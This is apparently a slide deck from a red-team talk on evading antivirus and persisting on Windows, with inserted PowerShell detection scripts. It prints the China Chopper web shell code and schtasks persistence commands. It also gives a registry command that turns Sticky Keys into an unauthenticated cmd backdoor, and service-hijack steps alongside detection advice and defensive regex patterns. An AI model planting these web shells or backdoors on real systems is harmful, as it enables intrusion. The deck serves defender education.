The Supporting Role of Antivirus while Persisting
@ChrisTruncer
Christopher Truncer
Previous Systems Administrator turned Red Teamer
Red Team Lead at Mandiant
Florida State Seminole
Open Source Developer
What’s this talk about?
◉ How Stagers Work
◉ Case Study: Bypassing a Signature
◉ The Right Way to do Detection
◉ Persistence - lots of it! :)
◉ Old School and New School Techniques
◉ Persistence Detection
◉ Questions
Antivirus Evasion
Antivirus Evasion
◉ White hats and attackers both need to evade antivirus
◉ Evading to establish immediate C&C of compromised system
◉ Also used to maintain access on a system/in a network
Antivirus Evasion
◉ If required to use an executable, we’ll use a stager
◉ Stager - Veil-Evasion or MSFVenom output
◉ Inject shellcode into memory
◉ Shellcode will download and inject a reflective DLL
◉ A “loader” for your real malware
Stagers
◉ Stagers can be developed in any language that can interact with the Windows functions
◉ It’s not hard to write a stager
○ Just four function calls
Stagers
◉ Allocate memory to store shellcode, and set the proper memory permissions
◉ Copy shellcode into the allocated memory
◉ Create a thread to execute the shellcode
◉ Have the code wait until the thread is done executing
Stagers
◉ VirtualAlloc
◉ RtlMoveMemory
◉ CreateThread
◉ WaitForSingleObject
AV’s Approach to Catching Malware
Methods of Detection
◉ Signature Based
○ This is what Veil-Evasion targets
◉ Heuristics Based
◉ Crowd Sourced
○ Reputation Based
Veil’s Approach to Bypassing AV
Approaches to Bypassing AV
◉ Ghost code / net no-operation code
◉ Encrypted binaries
○ Hyperion
◉ Custom Code
Veil’s Approach
◉ Fight on-disk detection through different techniques
○ Obfuscated code
○ Encrypted code
○ Non-standard languages for Windows binaries
■ Python, Ruby, Perl, etc.
○ Shellcode-less binaries
Veil’s Approach
◉ Languages within Veil-Evasion
○ Python
○ Perl
○ PowerShell
○ C#
○ C
○ Go
○ Ruby
Veil’s Approach
◉ Using a language that’s not C or C# made a large difference
○ AV programs didn’t know, or couldn’t properly inspect, non-standard languages
◉ Example:
○ C vs. Python
Simply changing the language the code is written in completely bypassed all signatures.
Veil Module
Veil Module
◉ Add a little complexity, so it isn’t just easily obvious what is happening
◉ What about encrypting the code?
◉ What about making the tool brute-force its own key?
Stallion
◉ Generate a random encryption key that is artificially constrained
○ JDUdmdkdueoLKJMsdfjkn#$%d + 1234567
◉ Test for a known string with the decryption key
○ If it doesn’t match, it’s the wrong key
○ If it matches, decrypt the shellcode and inject it into memory
Signature Bypass
Signature Bypass
◉ After approximately one year, Veil had its first AV signature
Signature Bypass
◉ I was excited to see if someone finally figured Veil-Evasion out
○ It is open source…
◉ Previous attempts have turned out fairly humorous
Persistence
Hosts vs. Networks
Persistence Purposes
◉ Persistence is commonly used for one of two purposes:
○ Persisting on a host
○ Persisting in a network
◉ A lot of the techniques I will cover can facilitate access for both purposes
Persisting Hosts
◉ When persisting a host, an attacker is looking for ad-hoc or programmatically defined access to a system
○ Attackers want this as close to on-demand as possible
◉ The efforts undertaken by an attacker are directed at maintaining access to a specific host
Persisting Hosts
◉ What’s needed for persisting hosts?
○ Survive reboots
■ Probably the most important concept
○ Have administrative rights on the system
○ Complement network-based persistence
Persisting Networks
◉ Network-based persistence in two contexts
○ Used to maintain access into a network
■ Similar to host-based persistence, but its purpose isn’t access to a host, but to the network
○ Used to maintain access into different networks
■ Don’t want to be VLANed off in a VOIP network
Persisting Networks (continued)
◉ What are other network-based persistence options?
○ Attackers can use persistence not only to maintain access to a network, but also to obtain their required domain permissions on-demand
○ Access likely facilitated through a host-based persistence technique
Persisting Networks
Web Shells
◉ Funny, this seems so trivial and easy that no one would ever use it…
◉ ...that’s not the case
○ China Chopper - APT17, APT19, APT22
○ ITSecShell, reDuh, ASPShell
○ Even commodity code
China Chopper
◉ Very tiny webshell, about 4 KB stored server side
◉ Developed in a variety of languages
○ CFM
○ ASP
○ PHP
○ Etc.
◉ A client application is used to interact with the webshell
China Chopper Server Code
◉ ASP
○ <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>
◉ PHP
○ <?php @eval($_POST['password']);?>
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
China Chopper
◉ Really useful features in China Chopper
○ File explorer
○ Upload/download files
○ Modify file timestamp attributes
○ Database client - MSSQL, MySQL
○ Command shell
Web Shell Prevention & Detection
◉ Hunt/sweep for known bad files
○ Hashes, or other file-based indicators
◉ Block all file types except the ones you expect for upload functionality (an allow list, not a block list)
◉ Don’t allow your web server to execute files uploaded from untrusted sources
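The sweep recommended on this slide, as an added example written for this page (it is not code from the talk or from any China Chopper analysis): it greps a web root for the two server-side one-liners shown above and lists anything in an upload directory whose extension is outside an allow list. The paths in `$WebRoot`, `$UploadDir` and the `$AllowedUploadExt` list are assumptions to adjust for your server.

```powershell
# Added example, not code from the talk: sweep a web root for China Chopper-style one-liners
# and for unexpected file types sitting in an upload directory.
# $WebRoot, $UploadDir and $AllowedUploadExt are assumptions; set them for your server.
param(
    [string]$WebRoot = 'C:\inetpub\wwwroot',
    [string]$UploadDir = 'C:\inetpub\wwwroot\uploads',
    [string[]]$AllowedUploadExt = @('.jpg', '.jpeg', '.png', '.gif', '.pdf')
)

# Content patterns derived from the ASP/JScript and PHP server code on the slide.
$shellPatterns = @(
    'eval\(Request\.Item\[',          # <%eval(Request.Item["..."],"unsafe");%>
    '@eval\(\$_POST\[',               # <?php @eval($_POST['...']);?>
    'eval\(\$_(POST|GET|REQUEST)\['   # same idea without the @, or fed from GET/REQUEST
)

function Find-WebShellCandidates {
    param([string]$Root)
    Get-ChildItem -Path $Root -Recurse -File -Include *.asp, *.aspx, *.ashx, *.php, *.cfm, *.jsp -ErrorAction SilentlyContinue |
        Select-String -Pattern $shellPatterns -List |
        ForEach-Object {
            $f = Get-Item -LiteralPath $_.Path
            [pscustomobject]@{
                Path     = $_.Path
                Pattern  = $_.Pattern
                SizeKB   = [math]::Round($f.Length / 1KB, 1)
                Modified = $f.LastWriteTime    # informational only: the shell can rewrite timestamps
                SHA256   = (Get-FileHash -LiteralPath $_.Path -Algorithm SHA256).Hash
            }
        }
}

function Find-UnexpectedUploads {
    param([string]$Dir, [string[]]$Allowed)
    Get-ChildItem -Path $Dir -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $Allowed -notcontains $_.Extension.ToLower() } |
        Select-Object FullName, Length, LastWriteTime
}

"== Files matching web shell patterns under $WebRoot =="
Find-WebShellCandidates -Root $WebRoot | Format-Table -AutoSize
"== Files in $UploadDir outside the allowed extensions =="
Find-UnexpectedUploads -Dir $UploadDir -Allowed $AllowedUploadExt | Format-Table -AutoSize
```

Because the slides note that China Chopper can modify file timestamp attributes, the sweep keys on file content and hashes rather than on modification time; the hashes of confirmed hits are what you feed back into the "known bad files" list for the next sweep.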
Magic Packet
◉ Or “how to access port 12345 with a packet to port 443”
◉ The attacker’s problem:
○ Compromised a web server (ports 80 and 443 are in use)
○ Firewall(s) prevent connections to any other port
○ Wants a TCP backdoor to be remotely accessible
■ Can’t be bothered to write a webshell
Magic Packet
◉ Run a backdoor listening on port 12345
◉ Run malware “low” in the network stack
○ Check incoming TCP SYN packets
○ When a SYN packet is received with a specific signature, change the destination port from 443 to 12345
○ The Windows network stack then delivers the packet to port 12345
○ The malware alters the port in all subsequent packets for the stream
[Diagram: a SYN to dport 443 carrying data=s3cr37 is rewritten by the malware to dport 12345 before the compromised system’s stack sees it; the SYN/ACK leaving from sport 12345 is rewritten back to sport 443. The compromised system has listeners on 443 and 12345.]
Magic Packet - Defenses
◉ This malware was installed via a custom compiled executable
○ Application whitelisting
○ Device Guard
Outlook
◉ Outlook rules can help provide a very unique on-demand foothold onto a host
◉ Silent Break wrote a post on leveraging Outlook rules to gain access to a user’s system
◉ Provides access immediately when Outlook triggers the rule
Outlook
◉ Attacker creates an Outlook rule to execute a binary when the “trigger” subject is received
◉ Attacker syncs the rule against the target user’s account
◉ Send an e-mail with the trigger in the subject
◉ Get shell :)
Outlook - Additional Tweaks
◉ Have another rule auto-delete the incoming e-mail so the user never sees the trigger
○ https://silentbreaksecurity.com/malicious-outlook-rules/
Outlook - Detection
◉ Honestly, not certain of the best means to detect this at scale
◉ Primary IOC is a rule that executes a program when an e-mail is received
○ I don’t know of any legitimate use cases for this
Persisting Hosts
Registry Hacks
◉ This is the 101 method for persistence that almost everyone learns
◉ Extremely easy to set up, and can be installed with a range of permissions
Registry Hacks
◉ These can be configured to run when the system starts, or when a user logs into the system
○ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
○ HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
◉ These methods are highly publicized and well known.
◉ Defensive tools look for these
Registry Hacks - Takeaway
◉ These can be good for maintaining initial access, but not for long term use
◉ SOCs - you want to have the ability to detect these
Startup Folder
◉ Your system will execute files in the startup folder
○ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
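The "SOCs, you want the ability to detect these" takeaway, as an added example (not code from the talk): it snapshots the two Run keys and the all-users Startup folder named on these slides into a JSON baseline, then reports entries that appear, disappear, or change (a new value name, a changed command line, or a replaced startup file with a different hash). `$BaselinePath` is an assumed location.

```powershell
# Added example, not code from the talk: baseline and diff the autostart locations on the
# slides (HKLM/HKCU Run keys and the all-users Startup folder).
# $BaselinePath is an assumption; run once with -Save on a clean build, then without it.
param(
    [string]$BaselinePath = 'C:\Baselines\autoruns.json',
    [switch]$Save
)

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)
$startupFolder = 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'

function Get-AutostartState {
    $entries = [System.Collections.Generic.List[object]]::new()
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            # Skip the provider bookkeeping properties that Get-ItemProperty adds.
            if ($p.Name -match '^PS(Path|ParentPath|ChildName|Drive|Provider)$') { continue }
            $entries.Add([pscustomobject]@{ Source = $key; Name = $p.Name; Value = [string]$p.Value })
        }
    }
    # For startup files the "value" is the file hash, so a swapped binary shows up as a change.
    Get-ChildItem -Path $startupFolder -File -ErrorAction SilentlyContinue | ForEach-Object {
        $entries.Add([pscustomobject]@{
            Source = $startupFolder
            Name   = $_.Name
            Value  = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
        })
    }
    $entries | Sort-Object Source, Name
}

$current = @(Get-AutostartState)

if ($Save) {
    $current | ConvertTo-Json -Depth 3 | Set-Content -Path $BaselinePath
    Write-Host "Saved $($current.Count) autostart entries to $BaselinePath"
    return
}

if (-not (Test-Path $BaselinePath)) { throw "No baseline at $BaselinePath; run with -Save first." }
$baseline = @(Get-Content -Path $BaselinePath -Raw | ConvertFrom-Json)

# Compare on Source+Name+Value so a changed command line or replaced file is reported, not just new names.
Compare-Object -ReferenceObject $baseline -DifferenceObject $current -Property Source, Name, Value |
    ForEach-Object {
        $state = if ($_.SideIndicator -eq '=>') { 'NEW/CHANGED' } else { 'REMOVED' }
        '{0,-12} {1}  {2} = {3}' -f $state, $_.Source, $_.Name, $_.Value
    }
```

The HKCU key is read for the account running the script only; to cover every profile on a shared host, load each user's NTUSER.DAT hive or run the collection in each user's context.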
Scheduled Tasks
◉ Scheduled tasks are an easy way for a user of any level to persist on a system
◉ With the proper permissions, you can schedule a task up to the SYSTEM level
◉ This is Microsoft’s recommendation/alternative to using “at” jobs
Scheduled Tasks
◉ Scheduled tasks can be created from the command line with schtasks.exe or the GUI
◉ Tasks can run at startup, when a user logs into the system, after the system has been idle, etc.
◉ Tasks can run binaries, PowerShell one-liners, and more
Scheduled Tasks
◉ schtasks /create /tn SysUpdate /sc onidle /i 15 /tr c:\users\chris\downloads\safe.exe
◉ schtasks /create /tn WinUpdate /sc onstart /ru System /tr c:\totallylegit.exe /s winsqldbsystem
Scheduled Tasks - Detection
◉ Obtain a baseline of the scheduled tasks set to run on your systems
○ schtasks /query
○ Task Scheduler
○ Etc.
◉ Audit systems and identify deviations from your baseline
Service Manipulation
◉ Services usually run with SYSTEM-level permissions, so they can be juicy targets for attackers
◉ Easy way to install service based persistence? Check service binary write permissions!
Service Manipulation
◉ Now that you’ve found services that can be modified, you just need a service binary.
○ Veil-Evasion, PowerUp, custom code
◉ Save the original service binary
◉ Bounce the box (or service) if required
Sticky Keys
◉ With administrative access to a machine, you can easily set up sticky keys
○ Back up the original sethc.exe
○ Copy cmd.exe to C:\Windows\System32\sethc.exe
○ Reboot, and hit Shift five times
Sticky Keys - Another Method
◉ Set cmd.exe as the debugger for sethc.exe
◉ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Sticky Keys - Another Method
◉ Main problem - doesn’t require authentication
◉ If using Sticky Keys, ensure it’s calling back to a location you control, vs. opening up the system for everyone
Sticky Keys - Detection
◉ Compare known good sethc.exe binary hash with systems’ current sethc.exe binary
◉ Ensure no registry key is added defining a debugger for sethc.exe
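Both detection bullets in one check, as an added example (not code from the talk): it inspects sethc.exe for a replaced binary and for an Image File Execution Options debugger. As an extension of the slide, which only names sethc.exe, the same check is run over the other accessibility executables reachable from the logon screen. Besides comparing against a known-good hash, it reads the file's version resource: a cmd.exe copied over sethc.exe still reports cmd.exe's `OriginalFilename`, so the check works even before you have collected hashes. `$KnownGoodHashes` is a placeholder you fill from a clean image.

```powershell
# Added example, not code from the talk: detect the two Sticky Keys backdoors described on the
# slides (replaced binary, IFEO Debugger value) for sethc.exe and, as an extension, the other
# logon-screen accessibility executables. $KnownGoodHashes is a placeholder map from a clean image.
param(
    [hashtable]$KnownGoodHashes = @{}   # e.g. @{ 'sethc.exe' = '<SHA256 from a clean build>' }
)
$accessibilityExes = @('sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe', 'magnify.exe', 'displayswitch.exe', 'atbroker.exe')
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

function Test-AccessibilityBinary {
    param([string]$Name)
    $path = Join-Path $env:SystemRoot ("System32\" + $Name)
    $findings = [System.Collections.Generic.List[string]]::new()

    if (Test-Path -LiteralPath $path) {
        $item = Get-Item -LiteralPath $path
        # A copied cmd.exe keeps its own version resource, so OriginalFilename no longer matches.
        $orig = $item.VersionInfo.OriginalFilename
        if ($orig -and ($orig -ne $Name)) { $findings.Add("version resource says OriginalFilename='$orig'") }

        # Catalog-signed system files report Valid on Windows 8+; on older builds treat NotSigned as a weak signal.
        $sig = Get-AuthenticodeSignature -FilePath $path
        if ($sig.Status -ne 'Valid') { $findings.Add("signature status $($sig.Status)") }

        if ($KnownGoodHashes.ContainsKey($Name)) {
            $h = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
            if ($h -ne $KnownGoodHashes[$Name]) { $findings.Add("SHA256 $h differs from known-good") }
        }
    } else {
        $findings.Add("file missing at $path")
    }

    # The REG ADD on the slide creates this value; no accessibility tool legitimately needs a debugger.
    $dbg = Get-ItemProperty -Path (Join-Path $ifeo $Name) -Name Debugger -ErrorAction SilentlyContinue
    if ($dbg) { $findings.Add("IFEO Debugger = '$($dbg.Debugger)'") }

    [pscustomobject]@{
        Binary     = $Name
        Suspicious = ($findings.Count -gt 0)
        Findings   = ($findings -join '; ')
    }
}

$accessibilityExes | ForEach-Object { Test-AccessibilityBinary -Name $_ } | Format-Table -AutoSize
```

A version-resource mismatch or an IFEO Debugger value on any of these binaries is worth treating as a confirmed finding rather than a lead; neither has a legitimate reason to exist on a managed host.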
New School Persistence Techniques
DLL Search Order Hijack
◉ DLL search order hijacking exploits how Windows searches for DLLs when loading an executable
◉ Specifically, it exploits the fact that Windows will always search the current folder of the executable for a DLL
DLL Search Order Hijack
◉ Sample in CAPEC
○ If you drop ntshrui.dll within C:\Windows and run explorer.exe, you can get the DLL within C:\Windows to be executed
◉ This exploits the order in which the DLL is searched for on a Windows system
DLL Search Order Hijack
◉ Attackers create malicious DLLs that exploit this search order to get their DLL to run on a system
◉ Since it’s every time the application runs, it can be used as a persistence technique
◉ PowerUp can be used to find these opportunities
DLL Search Order Hijack
◉ Used by the following actors:
○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26
◉ Used by the following malware:
○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER
Legitimate Scheduled Tasks
◉ Easy to identify scheduled tasks named “Evil task”
◉ First we must look at how investigators detect malicious scheduled tasks
Legitimate Scheduled Tasks
◉ Stacking tasks across multiple systems to determine anomalous tasks
◉ Parse task scheduler log (schedLgu.txt)
Legitimate Scheduled Tasks
◉ What if we modify existing legitimate scheduled tasks?
○ Specifically tasks that are not required for Windows functionality
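An added example (not code from the talk) serving two slides at once: the "Scheduled Tasks - Detection" advice to baseline tasks and audit deviations, and the "stacking tasks across multiple systems" approach investigators use, which is what catches a legitimate task whose action was quietly modified. Each host runs the script with `-Collect` to export its task definitions; the exports are then stacked centrally to surface definitions seen on only a few hosts and task names that exist everywhere but point at different actions on some machines. It uses the ScheduledTasks module (Windows 8 / Server 2012 and later); `$ExportDir` and `$RareThreshold` are assumptions.

```powershell
# Added example, not code from the talk: collect each host's scheduled task definitions and
# stack the exports from many hosts so rare definitions and divergent actions stand out.
# Requires the ScheduledTasks module. $ExportDir and $RareThreshold are assumptions.
param(
    [string]$ExportDir = 'C:\Baselines\tasks',   # one JSON export per host, named <hostname>.json
    [int]$RareThreshold = 2,                     # definitions seen on this many hosts or fewer are reported
    [switch]$Collect                             # run with -Collect on each host, then without it centrally
)

function Get-TaskState {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($a in $task.Actions) {          # one row per action; a task may have several
            [pscustomobject]@{
                Task      = $task.TaskPath + $task.TaskName
                RunAs     = [string]$task.Principal.UserId
                Execute   = [string]$a.Execute       # empty for COM-handler actions
                Arguments = [string]$a.Arguments
                Triggers  = ($task.Triggers | ForEach-Object { $_.CimClass.CimClassName -replace '^MSFT_Task', '' }) -join ','
            }
        }
    } | Sort-Object Task, Execute
}

if ($Collect) {
    New-Item -ItemType Directory -Path $ExportDir -Force | Out-Null
    $out = Join-Path $ExportDir "$($env:COMPUTERNAME).json"
    Get-TaskState | ConvertTo-Json -Depth 3 | Set-Content -Path $out
    Write-Host "Wrote $out"
    return
}

# Load every host's export and tag each row with the host it came from.
$rows = foreach ($f in Get-ChildItem -Path $ExportDir -Filter *.json -File) {
    Get-Content -Path $f.FullName -Raw | ConvertFrom-Json | ForEach-Object {
        $_ | Add-Member -NotePropertyName Host -NotePropertyValue $f.BaseName -PassThru
    }
}
$hostCount = @($rows.Host | Select-Object -Unique).Count

"Stacked $hostCount host(s). Task definitions seen on $RareThreshold host(s) or fewer:"
$rows | Group-Object Task, RunAs, Execute, Arguments |
    Where-Object { @($_.Group.Host | Select-Object -Unique).Count -le $RareThreshold } |
    ForEach-Object {
        [pscustomobject]@{
            Hosts     = (@($_.Group.Host | Select-Object -Unique) -join ',')
            Task      = $_.Group[0].Task
            RunAs     = $_.Group[0].RunAs
            Execute   = $_.Group[0].Execute
            Arguments = $_.Group[0].Arguments
        }
    } | Format-Table -AutoSize

# A task name present on every host whose action differs on some of them is what a quietly
# modified legitimate task looks like.
"Tasks present on every host with more than one action definition:"
$rows | Group-Object Task |
    Where-Object {
        @($_.Group.Host | Select-Object -Unique).Count -eq $hostCount -and
        @($_.Group | Group-Object Execute, Arguments).Count -gt 1
    } |
    ForEach-Object {
        "  $($_.Name)"
        $_.Group | Group-Object Execute, Arguments | ForEach-Object {
            '    {0,3} host(s): {1} {2}' -f @($_.Group.Host | Select-Object -Unique).Count, $_.Group[0].Execute, $_.Group[0].Arguments
        }
    }
```

Stacking is only as good as the population: the exports should come from hosts built from the same image, otherwise legitimate per-role tasks will dominate the "rare" list.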
Unquoted Service Paths
◉ Unquoted service paths exploit the order in which Windows searches for a binary when a space is in an unquoted path
○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
Unquoted Service Paths
◉ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
○ C:\Program.exe
○ C:\Program Files(x86)\Steam\Steam.exe
○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
◉ Three opportunities
Unquoted Service Paths
◉ If we have write access to any of the paths that Windows looks in, we can hijack the service
○ Just need a service binary
◉ Drop it into any of the paths on the previous slide, and restart the service
○ Might need to wait for a reboot
Unquoted Service Paths - Prevention
◉ Check service binaries on your images and determine if any are using unquoted service paths.
◉ Make sure the paths aren’t writable to non-admins.
◉ PowerUp can find these as well
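The audit recommended here, as an added example (written for this page; it is neither code from the talk nor PowerUp): it covers both the "Service Manipulation" slides (service binaries whose ACL lets low-privileged groups replace them) and the unquoted-path prevention bullets above. For each unquoted image path containing spaces it lists the intermediate `<prefix>.exe` candidates in the order Windows tries them, exactly as the Steam example on the slide, and reports whether each candidate's parent folder is writable by a broad group. The `$lowPrivIdentities` list is an assumption to extend with any broad groups in your environment.

```powershell
# Added example, not code from the talk (and not PowerUp): audit services for writable binaries
# and for unquoted image paths with spaces. $lowPrivIdentities is an assumption.
$lowPrivIdentities = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Only rights that let someone change or replace the file; read/execute rights are deliberately excluded.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, WriteAttributes, WriteExtendedAttributes, Delete, ChangePermissions, TakeOwnership'

function Test-LowPrivWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($lowPrivIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ServiceImage {
    # Extract the executable from each service's command line and note whether it was quoted.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $raw = [string]$_.PathName
        if ([string]::IsNullOrWhiteSpace($raw)) { return }
        if ($raw.StartsWith('"')) {
            $end = $raw.IndexOf('"', 1); if ($end -lt 0) { $end = $raw.Length }
            $exe = $raw.Substring(1, $end - 1); $quoted = $true
        } else {
            # Unquoted: the image is everything up to and including the first ".exe".
            $i = $raw.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
            $exe = if ($i -ge 0) { $raw.Substring(0, $i + 4) } else { ($raw -split ' ')[0] }
            $quoted = $false
        }
        [pscustomobject]@{
            Name      = $_.Name
            StartName = $_.StartName
            Exe       = [System.Environment]::ExpandEnvironmentVariables($exe)
            Unquoted  = (-not $quoted) -and ($exe -match ' ')
        }
    }
}

function Get-UnquotedCandidates {
    # For "C:\Program Files(x86)\Steam\Steam Gaming\steam.exe" this yields C:\Program.exe,
    # C:\Program Files(x86)\Steam\Steam.exe and finally the full path, matching the slide.
    param([string]$Exe)
    $parts = $Exe -split ' '
    for ($n = 1; $n -lt $parts.Count; $n++) { ($parts[0..($n - 1)] -join ' ') + '.exe' }
    $Exe
}

$services = Get-ServiceImage

"== Service binaries writable by low-privileged identities =="
$services | Where-Object { Test-LowPrivWritable -Path $_.Exe } | Format-Table Name, StartName, Exe -AutoSize

"== Unquoted service paths containing spaces =="
$services | Where-Object Unquoted | ForEach-Object {
    $svc = $_
    Get-UnquotedCandidates -Exe $svc.Exe | ForEach-Object {
        [pscustomobject]@{
            Service        = $svc.Name
            Candidate      = $_
            ParentWritable = Test-LowPrivWritable -Path (Split-Path -Path $_ -Parent)
        }
    }
} | Format-Table -AutoSize
```

Run it against the golden image before deployment: an unquoted path whose parent folders are all admin-only is a hygiene item, while one with `ParentWritable` true is the hijack opportunity the slide describes and should be fixed by quoting the path and tightening the folder ACL.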
WMI Requirements
◉ Event Filter
◉ Event Consumer
◉ Filter/Consumer Binding
WMI Requirements - Event Filter
◉ The WMI query that fires upon an event occurring
○ Usually an event class derived from __InstanceModificationEvent, __InstanceCreationEvent, or __InstanceDeletionEvent
WMI Requirements - Event Consumer
◉ There are five different event consumers
○ The most interesting one is “CommandLineEventConsumer”
◉ These “consume” or act on events that occur
WMI Requirements - Filter/Consumer Binding
◉ This associates a WMI Event Filter with the Event Consumer
WMI - Persistence
◉ PowerSploit’s persistence module for WMI
○ Automates the creation process
○ Will create a permanent WMI event subscription
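The detection side of the three WMI requirements above, as an added example (not code from the talk or PowerSploit): it reads the filters, consumers and bindings from `root/subscription` and joins them through the binding so that each permanent subscription is shown as one row with its query and what it executes. A `CommandLineEventConsumer` or `ActiveScriptEventConsumer` bound to an `__Instance*Event` query is the shape of the persistence described on these slides. The `$KnownGoodFilters` list is an assumption (Windows ships a small number of its own subscriptions).

```powershell
# Added example, not code from the talk: list permanent WMI event subscriptions, joining each
# binding to its filter query and consumer payload. $KnownGoodFilters is an assumption.
param([string[]]$KnownGoodFilters = @('SCM Event Log Filter'))

$ns = 'root/subscription'
$filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter -ErrorAction SilentlyContinue)
$consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer -ErrorAction SilentlyContinue)   # base class returns all five consumer types
$bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding -ErrorAction SilentlyContinue)

function Get-RefName {
    # Binding references arrive either as a CimInstance with key properties or as a string path
    # like __EventFilter.Name="foo"; return the instance name either way.
    param($Ref)
    if ($Ref -is [Microsoft.Management.Infrastructure.CimInstance]) { return [string]$Ref.Name }
    if ([string]$Ref -match 'Name="([^"]*)"') { return $Matches[1] }
    [string]$Ref
}

function Get-WmiSubscriptionReport {
    foreach ($b in $bindings) {
        $fName = Get-RefName $b.Filter
        $cName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object Name -eq $fName | Select-Object -First 1
        $c = $consumers | Where-Object Name -eq $cName | Select-Object -First 1
        $type = if ($c) { $c.CimClass.CimClassName } else { '(missing)' }
        # What actually runs when the filter fires, for the two consumer types that execute code.
        $payload = switch ($type) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' { if ($c.ScriptFileName) { $c.ScriptFileName } else { $c.ScriptText } }
            default                     { '' }
        }
        [pscustomobject]@{
            Filter       = $fName
            Query        = if ($f) { $f.Query } else { '(missing)' }
            ConsumerType = $type
            Consumer     = $cName
            Payload      = $payload
            ExecutesCode = ($type -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer')
            KnownGood    = ($KnownGoodFilters -contains $fName)
        }
    }
}

$report = @(Get-WmiSubscriptionReport)
"$($bindings.Count) binding(s), $($filters.Count) filter(s), $($consumers.Count) consumer(s) in $ns"
$report | Where-Object { -not $_.KnownGood } | Format-List
```

Filters or consumers with no binding are inert but still worth a glance, since an attacker may stage the pieces separately; the counts printed above against the number of rows reported will show whether any exist.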
PowerShell Profiles
◉ Anytime PowerShell runs, it will execute code in the default profile
◉ Create profile code here:
○ C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
PowerShell Profiles
◉ Use a standard persistence mechanism to execute PowerShell silently
○ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden
○ It’s a legit exe!
PowerShell Profiles
◉ Example in profile.ps1:
○ iex("write-host 'hello world'")
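A check for the profile locations these slides describe, as an added example (not code from the talk): it enumerates the machine-wide profile scripts under the `WindowsPowerShell\v1.0` folder named above (64-bit and 32-bit), plus every user's own profile scripts, hashes each one that exists, and flags content that evaluates or downloads code at start-up, as the `iex` example above does. The pattern lists are assumptions; most managed images ship no profile scripts at all, so any existing file is already worth reviewing.

```powershell
# Added example, not code from the talk: find PowerShell profile scripts and flag ones that
# evaluate or download code when PowerShell starts. The regex lists are assumptions.
$profilePaths = @(
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\profile.ps1",                      # path named on the slide
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1",
    "$env:SystemRoot\System32\WindowsPowerShell\v1.0\Microsoft.PowerShellISE_profile.ps1",
    "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\profile.ps1",                      # 32-bit host has its own
    "$env:SystemRoot\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1"
) + @(Get-ChildItem -Path 'C:\Users\*\Documents\WindowsPowerShell\*profile.ps1' -ErrorAction SilentlyContinue |
      Select-Object -ExpandProperty FullName)

function Test-PowerShellProfile {
    param([string]$Path)
    $exists  = Test-Path -LiteralPath $Path
    $content = if ($exists) { [string](Get-Content -LiteralPath $Path -Raw) } else { '' }
    [pscustomobject]@{
        Path      = $Path
        Exists    = $exists
        SHA256    = if ($exists) { (Get-FileHash -LiteralPath $Path -Algorithm SHA256).Hash } else { '' }
        # iex / Invoke-Expression / scriptblock creation: code built at run time rather than written in the file.
        EvalsCode = [bool]($content -match '(?i)(\biex\b|Invoke-Expression|\[scriptblock\]::Create|-EncodedCommand)')
        # Fetching something from the network during profile load.
        Downloads = [bool]($content -match '(?i)(DownloadString|DownloadFile|Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|Start-BitsTransfer)')
        SizeBytes = if ($exists) { (Get-Item -LiteralPath $Path).Length } else { 0 }
    }
}

$results = $profilePaths | Select-Object -Unique | ForEach-Object { Test-PowerShellProfile -Path $_ }
"Profile scripts present on this host:"
$results | Where-Object Exists | Format-Table Path, SizeBytes, EvalsCode, Downloads, SHA256 -AutoSize
```

Pair this with the previous slide's observation: a scheduled task or Run key that launches `powershell.exe -NonInteractive -WindowStyle Hidden` with no script argument is exactly the launcher that makes a profile script worth reading.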
Security Support Provider
